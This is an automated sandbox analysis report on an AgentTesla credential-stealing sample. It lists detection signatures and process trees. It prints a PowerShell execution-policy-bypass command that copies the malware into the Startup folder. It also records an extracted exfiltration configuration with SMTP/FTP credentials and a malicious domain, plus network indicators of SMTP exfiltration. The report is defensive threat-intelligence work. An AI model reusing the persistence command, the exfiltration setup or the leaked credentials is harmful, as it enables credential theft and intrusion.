Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report NKPhba0VZI.exe

Overview

General Information

Sample Name:NKPhba0VZI.exe
Analysis ID:358333
MD5:3a89cf2d6d2449ef1a9640af29f3a782
SHA1:220b9c5b4c7e9de15753f629da1ac3a075dc0800
SHA256:3d652eb897291f8eb2fe8f9374007388b0cd426a797de77545b82a325dde762a
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • NKPhba0VZI.exe (PID: 6112 cmdline: 'C:\Users\user\Desktop\NKPhba0VZI.exe' MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
    • powershell.exe (PID: 2576 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • NKPhba0VZI.exe (PID: 6064 cmdline: C:\Users\user\Desktop\NKPhba0VZI.exe MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
  • Drivers.exe (PID: 6520 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
    • powershell.exe (PID: 6716 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Drivers.exe (PID: 6980 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "FTP Info": "th3books@nobettwo.xyzK]Za#W.$sattnobettwo.xyz"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
          0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.NKPhba0VZI.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.2.NKPhba0VZI.exe.56b0000.7.raw.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                20.2.Drivers.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.NKPhba0VZI.exe.4125d70.3.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                    10.2.Drivers.exe.3b9f940.4.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 10.2.Drivers.exe.3ca23b8.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "FTP Info": "th3books@nobettwo.xyzK]Za#W.$sattnobettwo.xyz"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeReversingLabs: Detection: 26%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: NKPhba0VZI.exeReversingLabs: Detection: 26%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: NKPhba0VZI.exeJoe Sandbox ML: detected
                      Source: 20.2.Drivers.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.2.NKPhba0VZI.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                      Compliance:

                      barindex
                      Uses 32bit PE filesShow sources
                      Source: NKPhba0VZI.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                      Source: NKPhba0VZI.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: RunPE.pdb source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296374394.0000000002B68000.00000004.00000001.sdmp
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49737 -> 198.54.126.101:587
                      Source: global trafficTCP traffic: 192.168.2.3:49737 -> 198.54.126.101:587
                      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                      Source: global trafficTCP traffic: 192.168.2.3:49737 -> 198.54.126.101:587
                      Source: unknownDNS traffic detected: queries for: nobettwo.xyz
                      Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: NKPhba0VZI.exe, 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmpString found in binary or memory: http://blog.naver.com/cubemit314Ghttp://projectofsonagi.tistory.com/
                      Source: powershell.exe, 00000002.00000002.277720910.00000000076B0000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.co
                      Source: NKPhba0VZI.exe, 00000005.00000002.478647044.0000000002F04000.00000004.00000001.sdmpString found in binary or memory: http://nobettwo.xyz
                      Source: powershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://oVNzXy.com
                      Source: powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.267966815.0000000004531000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.371748819.0000000004C81000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: https://pNaYvIZ26OfWPs.net
                      Source: NKPhba0VZI.exe, 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, NKPhba0VZI.exe, 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: NKPhba0VZI.exe, 00000001.00000002.208702303.000000000136A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to dropped file
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 1_2_01686C71
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 1_2_01684FA0
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 1_2_0168B980
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 1_2_0168B990
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07547EA0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07547EA0
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D07880
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D05010
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D05E40
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D09F3A
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D031E0
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D00460
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D1D578
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D1317E
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D1EA08
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D11FE0
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D12768
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D1BAB0
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011D5840
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011DBAC8
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011D6F60
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011F35C8
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011F0040
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011F4355
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011F7A40
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011FAD00
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011FED38
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011FADE1
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_011F0E68
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_05134772
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_05133EA8
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_05134827
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_05133D4F
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 10_2_02A74FB0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 10_2_02A76C80
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 10_2_02A7B980
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 10_2_02A7B990
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_04C6D138
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_04C6D1C3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_07F04AB8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_07F0AF18
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_07F0AF07
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_07F04AA9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_08049AD8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_080450C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0804C4A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0804AAD8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_08046B30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_080450BA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0804C4A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_08078AD0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_08078AD0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_08070006
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_08070040
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 20_2_02CA4750
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 20_2_02CA3D2C
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 20_2_02CA81B9
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 20_2_02CA4827
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 20_2_02CA54D2
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 20_2_02CA3D20
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe 3D652EB897291F8EB2FE8F9374007388B0CD426A797DE77545B82A325DDE762A
                      Source: NKPhba0VZI.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Drivers.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPE.dll" vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameaGqFPgvIPMrNBrNVKGPQ.exe4 vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCaptIt.dll. vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000001.00000000.198462500.0000000000D53000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenpp.7.8.8.Installer.x64.exe4 vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000001.00000002.208702303.000000000136A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.472734152.0000000001030000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.465383827.0000000000883000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenpp.7.8.8.Installer.x64.exe4 vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.466697748.0000000000CF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameaGqFPgvIPMrNBrNVKGPQ.exe4 vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.467855777.0000000000D70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exeBinary or memory string: OriginalFilenamenpp.7.8.8.Installer.x64.exe4 vs NKPhba0VZI.exe
                      Source: NKPhba0VZI.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: NKPhba0VZI.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Drivers.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 1.0.NKPhba0VZI.exe.cd0000.0.unpack, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.2.NKPhba0VZI.exe.cd0000.0.unpack, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: Drivers.exe.2.dr, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.NKPhba0VZI.exe.800000.1.unpack, pptfile.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@12/12@2/1
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NKPhba0VZI.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_01
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5urz4n2.cbm.ps1Jump to behavior
                      Source: NKPhba0VZI.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: NKPhba0VZI.exeReversingLabs: Detection: 26%
                      Source: unknownProcess created: C:\Users\user\Desktop\NKPhba0VZI.exe 'C:\Users\user\Desktop\NKPhba0VZI.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\Desktop\NKPhba0VZI.exe C:\Users\user\Desktop\NKPhba0VZI.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess created: C:\Users\user\Desktop\NKPhba0VZI.exe C:\Users\user\Desktop\NKPhba0VZI.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
